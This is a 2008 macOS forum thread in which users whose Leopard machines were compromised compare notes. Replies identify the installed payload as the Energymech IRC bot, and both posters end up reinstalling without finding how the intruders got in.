Leopard Hack- what happened? bash history break down...

Discussion in 'macOS' started by aatawm, Dec 1, 2008.

  1. aatawm macrumors newbie

    Joined:
    Dec 15, 2006
    #1
    my leopard box recently got hacked, and i'm trying to decipher what was done, and how dire my situation is.

    i thought it was a trojan that maybe my gf had downloaded, but from what i can tell there have been no downloaded files, and she says she didn't download or install (or authenticate) anything.

    below is a link to my file serve where i have the bash history as well as the original files (which can also be downloaded from the curl in the bash history)

    so what were they trying to do?

    Http://file.meyersproduction.com/botdarwin

    system specs:
    2.8 dual quad mac pro
    web sharing
    remote access (ssh)
    remote management (vpn)
    print sharing

    firewall off

    ports were not routed to my system from the internet (local ip's had changed and hadn't been corrected to reach my box from the internets)

    i also have a dyndns set up that forwards to my ip.

    much thanks
     
  2. priller macrumors regular

    Joined:
    Dec 15, 2007
    #2
    Looks like it installs an irc bot called Energymech, most likely used for ddos or spam.
     
  3. mountainbiker80 macrumors member

    Joined:
    Sep 8, 2007
    #3
    Happened on my server

    I'm running OSX Server 10.5. Same thing happened to me. I have very strict password policies, and also had a webserver running.

    Did you ever figure out how it happened or what it was doing? Did you end up reimaging?
     
  4. aatawm thread starter macrumors newbie

    Joined:
    Dec 15, 2006
    #4
    reimaged

    i never figured out the attack vector, and ended up just reinstalling from scratch. which i was due for anyways...
     
  5. mountainbiker80 macrumors member

    Joined:
    Sep 8, 2007
    #5
    Thanks, man, for the quick reply. I'm going to end up reinstalling anyway too. Just confused as to how it happened in the first place, especially considering there isn't much info on this (from what I'm getting on Google, etc.).
     

Share This Page